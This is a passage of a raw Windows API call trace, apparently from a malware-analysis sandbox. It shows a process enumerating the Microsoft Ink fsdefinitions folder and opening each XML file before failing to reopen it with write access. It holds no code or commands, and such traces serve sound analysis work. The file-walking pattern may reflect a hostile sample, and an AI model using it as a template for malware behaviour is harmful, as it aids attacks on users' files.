(dwErrCode=0x5) [0083.105] GetLastError () returned 0x5 [0083.105] SetLastError (dwErrCode=0x5) [0083.105] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a790 | out: hHeap=0x20000) returned 1 [0083.105] AreFileApisANSI () returned 1 [0083.105] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d2c0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 72 [0083.105] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a958 [0083.105] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d2c0, cbMultiByte=-1, lpWideCharStr=0x8a958, cchWideChar=72 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\insert") returned 72 [0083.105] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\insert" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\insert"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0083.105] GetLastError () returned 0x5 [0083.105] GetLastError () returned 0x5 [0083.105] SetLastError (dwErrCode=0x5) [0083.105] GetLastError () returned 0x5 [0083.105] SetLastError (dwErrCode=0x5) [0083.105] GetLastError () returned 0x5 [0083.105] SetLastError (dwErrCode=0x5) [0083.105] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a958 | out: hHeap=0x20000) returned 1 [0083.105] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0083.105] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0083.105] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d2c0 | out: hHeap=0x20000) returned 1 [0083.105] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.105] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.105] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.105] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.106] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a5c8 [0083.106] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a498 [0083.106] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a5c8 | out: hHeap=0x20000) returned 1 [0083.106] FindNextFileW (in: hFindFile=0x780d0, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e421ed8, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x3e421ed8, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x3e421ed8, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0xd7, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="insert.xml", cAlternateFileName="")) returned 1 [0083.106] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0083.106] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0083.106] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0083.106] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0083.106] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0083.106] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0083.106] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0083.106] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0083.106] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cef0 [0083.106] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0083.106] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8ace8 [0083.106] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a660 [0083.106] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xd6) returned 0x5a6b8 [0083.106] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a660 | out: hHeap=0x20000) returned 1 [0083.106] FindFirstFileExW (in: lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\insert\\*", fInfoLevelId=0x0, lpFindFileData=0x313ef40, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x313ef40) returned 0x781d0 [0083.107] FindNextFileW (in: hFindFile=0x781d0, lpFindFileData=0x313ecc4 | out: lpFindFileData=0x313ecc4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b63f64, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa0638c00, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a354279, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0083.107] FindNextFileW (in: hFindFile=0x781d0, lpFindFileData=0x313ecc4 | out: lpFindFileData=0x313ecc4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e448143, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x3e448143, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x3e448143, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x387, dwReserved0=0x0, dwReserved1=0x0, cFileName="insertbase.xml", cAlternateFileName="")) returned 1 [0083.107] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5a6b8 | out: hHeap=0x20000) returned 1 [0083.107] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0083.107] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0083.107] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0083.107] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0083.107] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0083.107] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0083.107] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0083.107] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0083.107] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0083.107] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a368 [0083.107] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x46908 [0083.108] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a498 | out: hHeap=0x20000) returned 1 [0083.108] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0083.108] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cf40 [0083.108] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0083.108] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cf40 | out: hHeap=0x20000) returned 1 [0083.108] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfe0 [0083.108] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cf40 [0083.108] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfe0 | out: hHeap=0x20000) returned 1 [0083.108] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cf40 | out: hHeap=0x20000) returned 1 [0083.108] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0083.108] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a400 [0083.108] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0083.108] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xd6) returned 0x5a6b8 [0083.108] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a400 | out: hHeap=0x20000) returned 1 [0083.108] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0083.108] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xb0) returned 0x80fc0 [0083.108] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5a6b8 | out: hHeap=0x20000) returned 1 [0083.108] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.108] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.108] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.108] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.108] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x80fc0 | out: hHeap=0x20000) returned 1 [0083.108] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0083.108] AreFileApisANSI () returned 1 [0083.108] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\insert\\insertbase.xml", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\insert\\insertbase.xml", lpUsedDefaultChar=0x0) returned 87 [0083.108] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x719c8 [0083.108] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.108] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.108] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d090 [0083.108] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf10 [0083.108] AreFileApisANSI () returned 1 [0083.109] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x719c8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 87 [0083.109] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xae) returned 0x81918 [0083.109] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x719c8, cbMultiByte=-1, lpWideCharStr=0x81918, cchWideChar=87 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\insert\\insertbase.xml") returned 87 [0083.109] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\insert\\insertbase.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\insert\\insertbase.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x340 [0083.110] GetFileType (hFile=0x340) returned 0x1 [0083.110] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x81918 | out: hHeap=0x20000) returned 1 [0083.110] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0083.110] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0083.110] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0083.110] CloseHandle (hObject=0x340) returned 1 [0083.111] AreFileApisANSI () returned 1 [0083.111] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x719c8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 87 [0083.111] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xae) returned 0x817a8 [0083.111] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x719c8, cbMultiByte=-1, lpWideCharStr=0x817a8, cchWideChar=87 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\insert\\insertbase.xml") returned 87 [0083.111] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\insert\\insertbase.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\insert\\insertbase.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0083.111] GetLastError () returned 0x5 [0083.111] GetLastError () returned 0x5 [0083.111] SetLastError (dwErrCode=0x5) [0083.111] GetLastError () returned 0x5 [0083.111] SetLastError (dwErrCode=0x5) [0083.111] GetLastError () returned 0x5 [0083.111] SetLastError (dwErrCode=0x5) [0083.111] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x817a8 | out: hHeap=0x20000) returned 1 [0083.111] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0083.111] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0083.111] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x719c8 | out: hHeap=0x20000) returned 1 [0083.111] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.111] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.111] FindNextFileW (in: hFindFile=0x781d0, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x313f498, ftCreationTime.dwHighDateTime=0xac, ftLastAccessTime.dwLowDateTime=0x313f420, ftLastAccessTime.dwHighDateTime=0x77892b2c, ftLastWriteTime.dwLowDateTime=0x5a6c0, ftLastWriteTime.dwHighDateTime=0x313f210, nFileSizeHigh=0xac, nFileSizeLow=0x0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="t ", cAlternateFileName="渘Ĉ㪀ā湈Ĉ̓·")) returned 0 [0083.111] FindClose (in: hFindFile=0x781d0 | out: hFindFile=0x781d0) returned 1 [0083.111] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0083.111] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cf40 [0083.111] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0083.111] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cf40 | out: hHeap=0x20000) returned 1 [0083.111] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a368 | out: hHeap=0x20000) returned 1 [0083.111] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0083.112] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ace8 | out: hHeap=0x20000) returned 1 [0083.112] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0083.112] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0083.112] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46908 | out: hHeap=0x20000) returned 1 [0083.112] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf10 [0083.112] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0083.112] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0083.112] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0083.112] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0083.112] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0083.112] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0083.112] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0083.112] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0083.112] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8afe0 [0083.112] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0083.112] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xd6) returned 0x5a6b8 [0083.112] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8afe0 | out: hHeap=0x20000) returned 1 [0083.112] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0083.112] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x2e430 [0083.112] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5a6b8 | out: hHeap=0x20000) returned 1 [0083.112] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.112] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.112] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.112] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.112] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x2e430 | out: hHeap=0x20000) returned 1 [0083.112] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0083.112] AreFileApisANSI () returned 1 [0083.112] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\insert.xml", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\insert.xml", lpUsedDefaultChar=0x0) returned 76 [0083.112] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d790 [0083.112] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.112] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.112] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cee0 [0083.112] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf10 [0083.113] AreFileApisANSI () returned 1 [0083.113] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d790, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 76 [0083.113] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x98) returned 0x85580 [0083.113] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d790, cbMultiByte=-1, lpWideCharStr=0x85580, cchWideChar=76 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\insert.xml") returned 76 [0083.113] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\insert.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\insert.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x42c [0083.294] GetFileType (hFile=0x42c) returned 0x1 [0083.294] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x85580 | out: hHeap=0x20000) returned 1 [0083.294] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0083.294] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0083.294] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0083.294] CloseHandle (hObject=0x42c) returned 1 [0083.295] AreFileApisANSI () returned 1 [0083.295] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d790, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 76 [0083.295] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x98) returned 0x84fe0 [0083.295] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d790, cbMultiByte=-1, lpWideCharStr=0x84fe0, cchWideChar=76 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\insert.xml") returned 76 [0083.295] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\insert.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\insert.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0083.295] GetLastError () returned 0x5 [0083.295] GetLastError () returned 0x5 [0083.295] SetLastError (dwErrCode=0x5) [0083.295] GetLastError () returned 0x5 [0083.295] SetLastError (dwErrCode=0x5) [0083.295] GetLastError () returned 0x5 [0083.295] SetLastError (dwErrCode=0x5) [0083.295] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x84fe0 | out: hHeap=0x20000) returned 1 [0083.295] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0083.295] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0083.295] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d790 | out: hHeap=0x20000) returned 1 [0083.295] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.295] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.295] FindNextFileW (in: hFindFile=0x780d0, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b63f64, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa063932e, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a354279, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="keypad", cAlternateFileName="")) returned 1 [0083.295] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfa0 [0083.295] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0083.295] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0083.295] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0083.295] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d010 [0083.295] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0083.296] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0083.296] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0083.296] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a400 [0083.296] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a9f0 [0083.296] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a400 | out: hHeap=0x20000) returned 1 [0083.296] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.296] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.296] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.296] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, 